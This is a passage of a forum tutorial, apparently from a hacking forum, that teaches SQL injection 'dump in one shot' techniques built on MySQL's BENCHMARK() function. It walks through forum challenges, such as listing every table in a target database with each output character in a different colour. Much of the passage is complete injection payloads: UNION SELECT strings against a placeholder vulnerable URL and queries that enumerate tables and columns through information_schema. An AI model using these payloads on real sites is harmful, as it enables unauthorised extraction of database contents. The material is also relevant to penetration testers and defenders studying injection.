#7AC07C">),(@</span><span style="color: #66CCFF">rn</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">),(@</span><span style="color: #66CCFF">tbl</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),(@</span><span style="color: #66CCFF">cnt</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(@</span><span style="color: #66CCFF">tbl_odd</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),(@</span><span style="color: #66CCFF">tbl_odd_cnt</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(</span><span style="color: #66CCFF">select</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">from</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">columns</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">where<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">table_schema</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">database</span><span style="color: #7AC07C">())and(</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">in<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">y</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">concat<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">y</span><span style="color: #7AC07C">,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if((@</span><span style="color: #66CCFF">tbl</span><span style="color: #7AC07C">!=</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">),&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">concat<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">(if(@</span><span style="color: #66CCFF">tbl</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(if(</span><span style="color: #66CCFF">MOD</span><span style="color: #7AC07C">((@</span><span style="color: #66CCFF">cnt</span><span style="color: #7AC07C">:=(</span><span style="color: #66CCFF">select&nbsp;count</span><span style="color: #7AC07C">(*)&nbsp;</span><span style="color: #66CCFF">from&nbsp;information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">columns&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;where&nbsp;table_schema</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">database</span><span style="color: #7AC07C">()&nbsp;and&nbsp;</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">=@</span><span style="color: #66CCFF">tbl<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;),</span><span style="color: #66CCFF">2<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">)&gt;</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">,&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">concat<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">(&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if((@</span><span style="color: #66CCFF">tbl_odd_cnt</span><span style="color: #7AC07C">:=@</span><span style="color: #66CCFF">tbl_odd_cnt</span><span style="color: #7AC07C">%</span><span style="color: #66CCFF">2b1</span><span style="color: #7AC07C">),</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(@</span><span style="color: #66CCFF">tbl_odd</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">tbl_odd</span><span style="color: #7AC07C">,</span><span style="color: #FF99FF">','</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">),</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;),<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">0x00&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;),<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">0x00<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)<br>&nbsp;&nbsp;&nbsp;&nbsp;)</span><span style="color: #66CCFF">x<br></span><span style="color: #7AC07C">)&nbsp;<br></span></code></div></div></div><br>we checked if table has odd columns count. In that case we increased our counter for tables with <span style="color: #32CD32;">odd columns count</span> and store table name to compound variable <span style="color: #FFD700;">@tbl_odd</span>.<br><br>Then we transfer those variables to benchmark part (how to do it see in tutorial <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4153506" target="_blank">part #4</a></span>).<br><br>Final result with required table name's sorting in ascending order was:<br><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%235%20-%20Page%201_files/194fe8d57dc9dbfef5353855306083e0.jpg" alt="[Image: 194fe8d57dc9dbfef5353855306083e0.jpg]" border="0"><br><br><hr><br><span style="font-size: xx-large;"><span style="font-weight: bold;"><span style="color: #FFA500;">Using Benchmark() for other task as dump in one shot (DIOS)</span></span></span><br><br>Till now we saw Benchmark if powerful command and can be used for <a href="http://www.hackforums.net/showthread.php?tid=3487536" target="_blank"><span style="text-decoration: underline;">dump in one shot</span></a> (to display all databases, tables, columns, data from columns...). <span style="color: #32CD32;">But if we are clever enough we can use it for other task too.</span> <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%235%20-%20Page%201_files/victoire.gif" style="vertical-align: middle;" alt="Victoire" title="Victoire" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%235%20-%20Page%201_files/superman.gif" style="vertical-align: middle;" alt="Superman" title="Superman" border="0"><br><br>I will show you two cases: my challenges <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4032959" target="_blank">#89</a></span> and <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4055451" target="_blank">#91</a></span>. Both will give you idea what else can we do with Benchmark. Be creative <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%235%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"><br><br><span style="font-size: xx-large;"><span style="font-weight: bold;"><span style="color: #FFA500;">Challenge</span> <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4032959" target="_blank">#89</a></span></span></span><br><br>Main task in that challenge was:<ul><li>display numbered list of all tables in primary database where <span style="color: #FFD700;"><span style="font-weight: bold;">each character</span></span> in output is in different <span style="color: #FFD700;">c</span><span style="color: #32CD32;">o</span><span style="color: #FF0000;">l</span><span style="color: #00BFFF;">o</span><span style="color: #FFA500;">r</span><br></li></ul><br>Let's evaluate again Benchmark syntax from tutorial <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4134016" target="_blank">part #1</a></span>:<br><br><span style="font-size: large;"><span style="font-weight: bold;"><span style="color: #FFD700;">BENCHMARK(</span><span style="color: #32CD32;">count</span>, <span style="color: #00BFFF;">expr</span><span style="color: #FFD700;">)</span></span></span><br><br>Our <span style="color: #00BFFF;">pseudo </span>code (imagine we have 5 columns, vulnerable is column #4) will be:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">http</span><span style="color: #7AC07C">:</span><span style="color: #FFCCCC">//www.vulnerable_site.com/index.php?id=1&nbsp;and&nbsp;0&nbsp;UNION&nbsp;SELECT&nbsp;1,2,3,&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;</span><span style="color: #66CCFF">benchmark<br>&nbsp;&nbsp;</span><span style="color: #7AC07C">(<br>&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">count</span><span style="color: #7AC07C">,&nbsp;&nbsp;&nbsp;</span><span style="color: #FFCCCC">/*iterations*/<br>&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">expr&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #FFCCCC">/*expression*/<br>&nbsp;&nbsp;</span><span style="color: #7AC07C">)<br>,</span><span style="color: #66CCFF">5</span><span style="color: #7AC07C">--&nbsp;-&nbsp;<br></span></code></div></div></div><br>With <span style="color: #32CD32;">count</span> part we control how many times <span style="color: #32CD32;">expr</span>
 part will be executed. In that challenge we needed each character in 
output to be in different color. So we need a way to color each 
character.<br><br>For easier understanding I will color first <span style="color: #00BFFF;">version() with my name</span>. I will put both data to some local variable. Let's call it <span style="color: #FF1493;">@text</span>:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #7AC07C">@</span><span style="color: #66CCFF">text</span><span style="color: #7AC07C">:=&nbsp;</span><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">version</span><span style="color: #7AC07C">(),&nbsp;</span><span style="color: #66CCFF">0x203a3a20616a6b61726f</span><span style="color: #7AC07C">)&nbsp;<br></span></code></div></div></div>That part was easy.<br><br>If
 I want to color each character I will make iterations from first to 
last character in that variable (string). Number of iterations will be 
from <span style="color: #32CD32;">1</span> to <span style="color: #FFA500;">length(@text)</span>.<br><br>For
 taking individual character from the string we can use different 
functions like substr(), mid(), left()... Next thing we need is some 
variable that will be increased by <span style="color: #32CD32;">+1</span> to skip form each character to next character until we reach the end of our string in variable <span style="color: #FF1493;">@text</span><br><br>Our benchmark will be:<br><br><span style="color: #FFA500;">benchmark<br>(</span><br><span style="color: #FFD700;">count</span>, /*iterations*/<br><span style="color: #00BFFF;">expr</span> /*expression*/<br><span style="color: #FFA500;">)</span><br><br><span style="color: #FFD700;">Count</span> part will be defined with <span style="color: #FFD700;">length(@text)</span>. We want as many iterations as there are characters in our local variable.<br><br>In <span style="color: #00BFFF;">expr</span> we will put our code for coloring each character with different color. So our real benchmark code will be:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #7AC07C">if(&nbsp;</span><span style="color: #66CCFF">length</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">text</span><span style="color: #7AC07C">:=&nbsp;</span><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">version</span><span style="color: #7AC07C">(),&nbsp;</span><span style="color: #66CCFF">0x203a3a20616a6b61726f</span><span style="color: #7AC07C">))&gt;</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),<br>@</span><span style="color: #66CCFF">i</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,<br>@</span><span style="color: #66CCFF">o</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,<br>if(&nbsp;</span><span style="color: #66CCFF">benchmark<br>&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">(<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">length</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">text</span><span style="color: #7AC07C">),<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@</span><span style="color: #66CCFF">o</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">CONCAT<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">(<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@</span><span style="color: #66CCFF">o</span><span style="color: #7AC07C">,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(&nbsp;(@</span><span style="color: #66CCFF">i</span><span style="color: #7AC07C">:=@</span><span style="color: #66CCFF">i</span><span style="color: #7AC07C">%</span><span style="color: #66CCFF">2b1</span><span style="color: #7AC07C">)&gt;</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">concat<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">(&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">0x3c666f6e7420636f6c6f723d23</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #66CCFF">hex</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">crc32</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">rand</span><span style="color: #7AC07C">())),&nbsp;</span><span style="color: #66CCFF">0x3e</span><span style="color: #7AC07C">,&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">mid</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">text</span><span style="color: #7AC07C">,@</span><span style="color: #66CCFF">i</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">1</span><span style="color: #7AC07C">)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)<br>&nbsp;&nbsp;&nbsp;&nbsp;)=</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">,&nbsp;@</span><span style="color: #66CCFF">o</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00<br>&nbsp;&nbsp;</span><span style="color: #7AC07C">)<br>)&nbsp;<br></span></code></div></div></div><br>Let's analyze that code. At the top we assigned version with our name to local variable <span style="color: #FF1493;">@text</span>. We put that part inside of dummy check <span style="color: #32CD32;">length of that string is &gt; 0</span>, so nothing is display on screen.<br><br>Than we initialized variable <span style="color: #FF1493;">@i</span>. We used it for skipping part from character to character. Variable <span style="color: #FF1493;">@o</span> was used for final output. With concat() we added each colored character to it in very iteration.<br><br>In benchmark() we defined number of iterations with <span style="color: #FFD700;">length(@text)</span>, because we wanted each character in our string to be colored.<br><br>In <span style="color: #00BFFF;">expression</span> part (which was iterated <span style="color: #FFD700;">length(@text)</span> times) we first increased our counter variable <span style="color: #FF1493;">@i</span> by <span style="color: #32CD32;">+1</span>. Color will be defined with random hex value with concatenation of<br><br><span style="color: #FFD700;">&lt;font color=#</span>, <span style="color: #32CD32;">hex(crc32(rand()))</span>, <span style="color: #FFD700;">&gt;</span><br><br>After it individual character from string in our local variable <span style="color: #FF1493;">@text</span> was taken with function <span style="color: #FF1493;">mid()</span>. We always took only one character. As counter variable <span style="color: #FF1493;">@i</span> was increased by <span style="color: #32CD32;">+1</span> in each iteration always next character was taken.<br><br>And result of such code is colorful version with my nick name:<br><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%235%20-%20Page%201_files/41f22ee3c9e4fedfea9bfb4d9c369261.jpg" alt="[Image: 41f22ee3c9e4fedfea9bfb4d9c369261.jpg]" border="0"><br><br><br><span style="font-size: x-large;"><span style="font-weight: bold;"><span style="color: #FFA500;">How to color all tables in output?</span></span></span><br><br>Task in that challenge was to display numbered list of all tables in primary database where <span style="color: #FFD700;"><span style="font-weight: bold;">each character</span></span> in output is in different <span style="color: #FFD700;">c</span><span style="color: #32CD32;">o</span><span style="color: #FF0000;">l</span><span style="color: #00BFFF;">o</span><span style="color: #FFA500;">r</span><br><br>We are familiar with DIOS syntax for displaying numbering list with all tables in primary database:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">from</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">tables</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">where</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">table_schema</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">database</span><span style="color: #7AC07C">())and(</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">in</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x3c62723e</span><span style="color: #7AC07C">,<br></span><span style="color: #66CCFF">LPAD</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">running_number</span><span style="color: #7AC07C">:=@</span><span style="color: #66CCFF">running_number</span><span style="color: #7AC07C">%</span><span style="color: #66CCFF">2b1</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">2</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x30</span><span style="color: #7AC07C">),</span><span style="color: #66CCFF">0x2e20</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">))))</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">)&nbsp;<br></span></code></div></div></div><br>We will modify it with inserting benchmark function. Part <span style="color: #00BFFF;">LPAD(@running_number:=@running_number%2b1,2,0x30),0x2e20,table_name</span> will be executed <span style="font-weight: bold;"><span style="color: #FFA500;">within benchmark</span></span>:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">from</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),(@</span><span style="color: #66CCFF">running_number</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">),(</span><span style="color: #66CCFF">select</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">from</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">tables</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">where</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">table_schema</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">database</span><span style="color: #7AC07C">())and(</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">in</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x3c62723e</span><span style="color: #7AC07C">,<br></span><span style="color: #66CCFF">concat<br>&nbsp;</span><span style="color: #7AC07C">(<br>&nbsp;&nbsp;if(&nbsp;</span><span style="color: #66CCFF">length</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">text</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">LPAD</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">running_number</span><span style="color: #7AC07C">:=@</span><span style="color: #66CCFF">running_number</span><span style="color: #7AC07C">%</span><span style="color: #66CCFF">2b1</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">2</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x30</span><span style="color: #7AC07C">),</span><span style="color: #66CCFF">0x2e20</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">))&gt;</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),<br>&nbsp;&nbsp;@</span><span style="color: #66CCFF">i</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,<br>&nbsp;&nbsp;@</span><span style="color: #66CCFF">o</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,<br>&nbsp;&nbsp;if(&nbsp;</span><span style="color: #66CCFF">benchmark<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: 